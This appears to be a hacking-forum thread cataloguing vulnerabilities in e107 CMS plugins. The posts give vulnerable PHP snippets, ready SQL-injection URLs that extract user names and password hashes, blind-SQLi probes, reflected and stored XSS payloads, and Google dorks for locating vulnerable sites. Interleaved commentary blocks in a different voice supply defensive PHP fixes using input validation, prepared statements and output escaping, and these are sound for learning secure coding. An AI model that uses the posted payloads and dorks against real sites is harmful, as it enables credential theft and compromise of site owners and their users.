[ Overview of e107 CMS vulnerabilities ]

Discussion in 'Web vulnerabilities' started by ettee, 16 Aug 2007.

  1. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    roll_mini v1.2

    XSS:
    /roll.php
    PHP:
    if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
    Example:
    Code:
    http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Administrator rights required, SQL injection:
    /roll.php
    PHP:
    if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
    if ($_GET['add']) $add = $_GET['add'];
    if ($_GET['edit']) $edit = $_GET['edit'];
    if ($_GET['card_id']) $card_id = $_GET['card_id'];
    if ($_GET['index_name']) $index_name = $_GET['index_name'];
    if ($_GET['search']) $search = $_GET['search'];
    if ($_GET['page']) { $page = $_GET['page']; } else { $page = 1; }
    These variables are then used in database queries. Nothing is filtered.
    Example:
    Code:
    http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1
    Path:
    http://e107/e107_plugins/roll_mini/search.php


    Dork: inurl:e107_plugins/roll_mini/
     
  2. Фараон

    Locator v1.2

    Administrator rights required, SQL injection:
    /admin_countries.php
    PHP:
    $sql->db_Select(DB_TABLE_LOCATOR_COUNTRY, "*", "locator_country_id=".$_GET['locator_country_id']);
    Example:
    Code:
    http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
    Administrator rights required, SQL injection:
    /admin_categories.php
    PHP:
    $sql->db_Select(DB_TABLE_LOCATOR_TABLE, "*", "locator_cat_id=".$_GET['locator_cat_id']);
    Example:
    Code:
    http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
    There are plenty more bugs in the admin panel.

    Dork: inurl:e107_plugins/locator/
     
  3. Фараон

    League Version 1.04

    SQL injection:
    /lique.php
    PHP:
    ...
    if($_GET['Saison']){$Saison=$_GET['Saison'];}
    ...
    $query[0]="lique_games";
    $query[1]="*";
    $query[2]="games_home_id=".$pref['lique_my_team']." AND games_saison_id=".$Saison." AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500)." OR games_gast_id=".$pref['lique_my_team']." AND games_date<".$A=(time()-86400)." AND games_date>".(time()-604500)." ORDER BY games_date ";
    ...
    Example:
    Code:
    http://e107/e107_plugins/lique/lique.php?Saison=-2%20union%20select%201,concat_ws%280x3a,user_name,user_password%29,3,4,5%20from%20e107_user--
    Blind SQL injection:
    /scorer.php
    PHP:
    ...
    if($_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];}
    if($_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];}

    $z['games']=0;
    $sql->db_Select("lique_games", "*", "games_home_id=".$team." OR games_gast_id=".$team." ");
    while($row = $sql->db_Fetch()){
        $z['games']++;
    }

    $qry1="
       SELECT m.*, me.* FROM ".MPREFIX."lique_liga AS m
       LEFT JOIN ".MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id
       WHERE m.liga_id ='".$team."'
    ";

    $sql->db_Select_gen($qry1);
    $row = $sql->db_Fetch();
    $team_ID=$row['team_id'];
    $team_Name=$row['team_name'];
    $team_admin=$row['team_admin_id'];
    $team_url=$row['team_url'];
    $team_icon=$row['team_icon'];
    $team_description=$row['team_description'];

    $z['players']=0;
    $sql->db_Select("lique_roster", "*", "roster_team_id=".$team."");
    while($row = $sql->db_Fetch()){
        $z['players']++;
    }
    ...
    Example:
    Code:
    http://e107/e107_plugins/lique/scorer.php?team=1%20and%20substring%28@@version,1,1%29=5
    Blind SQL injection:
    /strafen.php
    PHP:
    ...
    if($_GET['Saison']){$Saison=$_GET['Saison'];}else{$Saison=$pref['lique_my_saison'];}
    if($_GET['team']){$team=$_GET['team'];}else{$team=$pref['lique_my_team'];}

    $z['games']=0;
    $sql->db_Select("lique_games", "*", "games_home_id=".$team." OR games_gast_id=".$team." ");
    while($row = $sql->db_Fetch()){
        $z['games']++;
    }

    $qry1="
       SELECT m.*, me.* FROM ".MPREFIX."lique_liga AS m
       LEFT JOIN ".MPREFIX."lique_teams AS me ON me.team_id=m.liga_team_id
       WHERE m.liga_id ='".$team."'
    ";

    $sql->db_Select_gen($qry1);
    $row = $sql->db_Fetch();
    $team_ID=$row['team_id'];
    $team_Name=$row['team_name'];
    $team_admin=$row['team_admin_id'];
    $team_url=$row['team_url'];
    $team_icon=$row['team_icon'];
    $team_description=$row['team_description'];

    $z['players']=0;
    $sql->db_Select("lique_roster", "*", "roster_team_id=".$team."");
    while($row = $sql->db_Fetch()){
        $z['players']++;
    }

    ...
    Example:
    Code:
    http://e107/e107_plugins/lique/strafen.php?team=1%20and%20substring%28@@version,1,1%29=5
    And plenty more bugs...
    Dork: inurl:e107_plugins/lique/
     
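The three posts above (roll_mini, Locator, League) share one root cause: a request parameter is concatenated into an integer comparison without quotes, so the `-1 union select ...` and `1 and substring(@@version,1,1)=5` payloads become part of the SQL. The following is an added example, not code from any of the plugins: it rebuilds just the WHERE fragment the way the posted snippets do and shows the two usual fixes (coercion with `intval()`, or strict validation). The helper names are mine, the e107 `$sql->db_Select()` call that would consume the fragment is left out, and the inputs are the posted payloads URL-decoded.

```php
<?php
// Added example (not roll_mini/Locator/League code): unquoted-integer SQL
// injection as in roll.php?card_id=, admin_countries.php?locator_country_id=,
// lique.php?Saison= and scorer.php/strafen.php?team=, plus two fixes.

// Vulnerable: the raw request value is concatenated into an integer
// comparison, so anything after the number is executed as SQL.
function where_vulnerable(string $column, array $get, string $param): string
{
    $value = isset($get[$param]) ? $get[$param] : '1';
    return $column . '=' . $value;
}

// Fix 1, coerce: cast before the value touches the query. intval() keeps
// only the leading numeric prefix, so the injected tail is discarded.
function where_coerced(string $column, array $get, string $param): string
{
    $value = isset($get[$param]) ? intval($get[$param]) : 1;
    return $column . '=' . $value;
}

// Fix 2, validate: for ids that must be positive integers, reject anything
// that is not purely digits instead of silently repairing it.
function where_validated(string $column, array $get, string $param): string
{
    $value = isset($get[$param]) ? $get[$param] : '1';
    if (!ctype_digit($value) || $value === '0') {
        throw new InvalidArgumentException("$param must be a positive integer");
    }
    return $column . '=' . $value;
}

// Constructed inputs: the union and blind payloads from the posts, URL-decoded.
$union = ['card_id' => '-1 union select 1,2,concat_ws(0x3a,user_name,user_password),4,5,6 from e107_user'];
$blind = ['team'    => '1 and substring(@@version,1,1)=5'];

foreach ([['card_id', 'card_id', $union], ['games_home_id', 'team', $blind]] as [$column, $param, $get]) {
    echo "vulnerable: ", where_vulnerable($column, $get, $param), "\n";
    echo "coerced:    ", where_coerced($column, $get, $param), "\n";
    try {
        echo "validated:  ", where_validated($column, $get, $param), "\n";
    } catch (InvalidArgumentException $e) {
        echo "validated:  rejected (", $e->getMessage(), ")\n";
    }
}
```

Run it with `php` on the command line. Coercion is the smaller patch for code like this, but it hides tampering; validation fails loudly, which is what you want for an admin-only id parameter that should never contain anything but digits.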
  4. Фараон

    AACGC MOH Stats V1.0

    SQL injection:
    /Member_Details.php
    PHP:
    ...
    if (e_QUERY) {
        $tmp = explode('.', e_QUERY);
        $action = $tmp[0];
        $sub_action = $tmp[1];
        $id = $tmp[2];
        unset($tmp);
    }

    ...
    $sql->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action", "");
    $row = $sql->db_Fetch();
    $sql2->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'", "");

    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_mohstats/Member_Details.php?det.2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
    Dork: inurl:e107_plugins/aacgc_mohstats/
     
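The injection above is different from the `?param=value` cases: e107 hands the plugin everything after the `?` as the constant `e_QUERY`, and the plugin splits it positionally on dots, so the second segment (`2 union select ...`) goes straight into `user_extended_id=$sub_action`. The following added example (not the AACGC MOH Stats plugin's code) reproduces that split and shows a parser that validates each positional field. The `det` action name is taken from the posted URL, but the allow-list and all function names are assumptions of mine; the payload is the posted one, URL-decoded, with the 36-column list shortened.

```php
<?php
// Added example (not the plugin's code): why "det.2 union select ..." lands
// in $sub_action, and a parser that rejects it.

// Mirrors the posted explode(): dots are the only separator, so spaces and
// SQL keywords ride along inside a single field.
function parse_e_query_vulnerable(string $eQuery): array
{
    $tmp = explode('.', $eQuery);
    return [
        'action'     => isset($tmp[0]) ? $tmp[0] : '',
        'sub_action' => isset($tmp[1]) ? $tmp[1] : '',
        'id'         => isset($tmp[2]) ? $tmp[2] : '',
    ];
}

// Hardened: every positional field is checked for the shape the code
// expects before it can reach a query. $allowedActions is an assumed
// allow-list; the real plugin's action names are not on the page.
function parse_e_query_hardened(string $eQuery, array $allowedActions): array
{
    $tmp = explode('.', $eQuery);
    if (count($tmp) > 3) {
        throw new InvalidArgumentException('too many query segments');
    }
    $action = $tmp[0] ?? '';
    if (!in_array($action, $allowedActions, true)) {
        throw new InvalidArgumentException('unknown action');
    }
    $sub = $tmp[1] ?? '';
    if ($sub !== '' && !ctype_digit($sub)) {
        throw new InvalidArgumentException('sub_action must be numeric');
    }
    $id = $tmp[2] ?? '';
    if ($id !== '' && !ctype_digit($id)) {
        throw new InvalidArgumentException('id must be numeric');
    }
    return ['action' => $action, 'sub_action' => (int) $sub, 'id' => (int) $id];
}

// Constructed input: the posted query string, URL-decoded and shortened.
// Note that the payload contains no dots, so it stays in one segment.
$payload = 'det.2 union select 1,2,3 from e107_user--';

$p = parse_e_query_vulnerable($payload);
// $p['sub_action'] is now the whole "2 union select ... --" string, which the
// plugin interpolates unquoted into "WHERE user_extended_id=$sub_action".
echo "vulnerable sub_action: ", $p['sub_action'], "\n";

try {
    parse_e_query_hardened($payload, ['det']);
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected (", $e->getMessage(), ")\n";
}

// A well-formed request still parses.
print_r(parse_e_query_hardened('det.2', ['det']));
```

The point of validating at the parse step rather than at each query is that `e_QUERY`-style routing tends to feed the same segments into several queries further down the file; one check at the top covers them all.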
  5. Фараон

    Userclass Images v09 Beta

    Administrator rights required, SQL injection:
    /admin.php
    PHP:
    ...
    $q = "SELECT * FROM ".MPREFIX."userclass_images WHERE userclass_id='$_POST[uid]'";
    ...
     
    #85 Фараон, 7 Jan 2011
    Last edited: 7 Jan 2011
  6. Фараон

    EveryPage v1.0

    Administrator rights required, SQL injection:
    /admin_config.php
    PHP:
    ...
    $query = "ep_text='". $_POST['code'] ."' WHERE ep_id='". $_POST['id'] ."'";
    ...
     
    #86 Фараон, 7 Jan 2011
    Last edited: 7 Jan 2011
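Unlike the unquoted-integer cases earlier in the thread, the Userclass Images and EveryPage snippets above put POST values inside single-quoted string literals, so the attacker's job is to close the quote. The following added example (not either plugin's code) runs that pattern against an in-memory SQLite table so it executes offline, and contrasts it with a bound-parameter query. e107 0.7 used the `mysql_*` extension; PDO prepared statements are the swapped-in fix shown here. The table and column names are modelled on the posted query fragment, not taken from the plugin, and the POST payload is constructed.

```php
<?php
// Added example (not EveryPage/Userclass Images code): quoted-string SQL
// injection in an UPDATE, vulnerable vs. parameterised, on SQLite via PDO.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Assumed schema, modelled on "ep_text='...' WHERE ep_id='...'".
    $db->exec("CREATE TABLE e107_everypage (ep_id INTEGER PRIMARY KEY, ep_text TEXT)");
    $db->exec("INSERT INTO e107_everypage VALUES (1,'page one'),(2,'page two'),(3,'page three')");
    return $db;
}

// Vulnerable: mirrors $query = "ep_text='".$_POST['code']."' WHERE ep_id='".$_POST['id']."'";
// A single quote in either field terminates the literal and the rest is SQL.
function update_vulnerable(PDO $db, array $post): int
{
    $query = "UPDATE e107_everypage SET ep_text='" . $post['code'] . "' WHERE ep_id='" . $post['id'] . "'";
    return $db->exec($query);
}

// Hardened: the values travel as bound parameters and are never parsed as SQL.
function update_hardened(PDO $db, array $post): int
{
    $stmt = $db->prepare("UPDATE e107_everypage SET ep_text=:code WHERE ep_id=:id");
    $stmt->execute([':code' => $post['code'], ':id' => $post['id']]);
    return $stmt->rowCount();
}

function dump_rows(PDO $db): array
{
    return $db->query("SELECT ep_id, ep_text FROM e107_everypage ORDER BY ep_id")
              ->fetchAll(PDO::FETCH_KEY_PAIR);
}

// Constructed input: an id that closes the quote and appends an always-true
// condition, so the WHERE clause matches every row in the vulnerable query.
$post = ['code' => 'defaced', 'id' => "1' OR '1'='1"];

$db = make_db();
echo "vulnerable: rows changed = ", update_vulnerable($db, $post), "\n";
print_r(dump_rows($db));

$db = make_db();
// With binding, ep_id is compared against the literal string "1' OR '1'='1",
// which matches no integer id.
echo "hardened: rows changed = ", update_hardened($db, $post), "\n";
print_r(dump_rows($db));
```

Requires the `pdo_sqlite` extension (enabled by default in most PHP builds). The same prepared-statement shape applies to the `userclass_id='$_POST[uid]'` SELECT in the Userclass Images post; escaping with the driver's quoting function would also work, but binding removes the question of whether every path was escaped.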
  7. Фараон

    Prayer Request Menu
    Version 2.5


    Active XSS:
    /prayers.php
    PHP:
    ...
    $_POST['prayer_name'];
    $_POST['prayer_body'];
    ...
    The variables listed above are not filtered in any way, so we end up with an active (stored) XSS!
    Go to the page http://e107/e107_plugins/prayer_menu/prayers.php?0.submit.0.0.0 and add an entry containing "<script>alert(111)</script>" in the "Title" and "Prayer Request" forms.

    Dork: inurl:e107_plugins/prayer_menu/
    P.S. I did this with administrator rights, so I can't vouch for mere mortal users ;)
     
    #87 Фараон, 15 Jan 2011
    Last edited: 15 Jan 2011
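The reflected XSS in roll_mini (`roll.php?cat=<script>...`, first post in the thread) and the stored XSS in the Prayer Request Menu above have the same fix on the output side: encode for the HTML context the value is written into. The following added example (not either plugin's code) renders the category and a stored prayer record first as the posts describe, then with per-context escaping. The render functions and record layout are mine; the `<script>` payloads are the posted ones, and the attribute-breakout title is a constructed input to show why `ENT_QUOTES` matters.

```php
<?php
// Added example (not roll_mini/prayer_menu code): output encoding for the
// reflected ?cat= value and for stored prayer_name/prayer_body fields.

// Vulnerable rendering: values are echoed as-is, so the browser parses any
// tag or attribute the submitter put in them.
function render_vulnerable(string $cat, array $prayers): string
{
    $html = "<h2>Category: $cat</h2>\n";
    foreach ($prayers as $p) {
        $html .= "<div class=\"prayer\" data-name=\"{$p['prayer_name']}\">{$p['prayer_body']}</div>\n";
    }
    return $html;
}

// Hardened rendering: one escaper applied at every sink. ENT_QUOTES encodes
// both quote characters, which is what keeps the attribute context safe;
// ENT_SUBSTITUTE and the charset stop malformed UTF-8 from yielding an empty
// string, which older htmlspecialchars() behaviour would otherwise do.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $cat, array $prayers): string
{
    $html = "<h2>Category: " . h($cat) . "</h2>\n";
    foreach ($prayers as $p) {
        $html .= '<div class="prayer" data-name="' . h($p['prayer_name']) . '">'
               . h($p['prayer_body']) . "</div>\n";
    }
    return $html;
}

// Constructed inputs: the reflected payload from the roll_mini post, and a
// stored record as it would come back from the database after the
// unfiltered POST described above. The prayer_name value is my own
// attribute-context variant, not a payload from the page.
$cat = '<script>alert(document.cookie)</script>';
$prayers = [
    ['prayer_name' => '" onmouseover="alert(111)', 'prayer_body' => '<script>alert(111)</script>'],
];

echo "--- vulnerable ---\n", render_vulnerable($cat, $prayers), "\n";
echo "--- hardened ---\n",   render_hardened($cat, $prayers), "\n";
```

Escaping on output is the part that stops the script from running; whether the plugin should also validate `prayer_name` and `prayer_body` on the way into the database is a separate question that the post does not address.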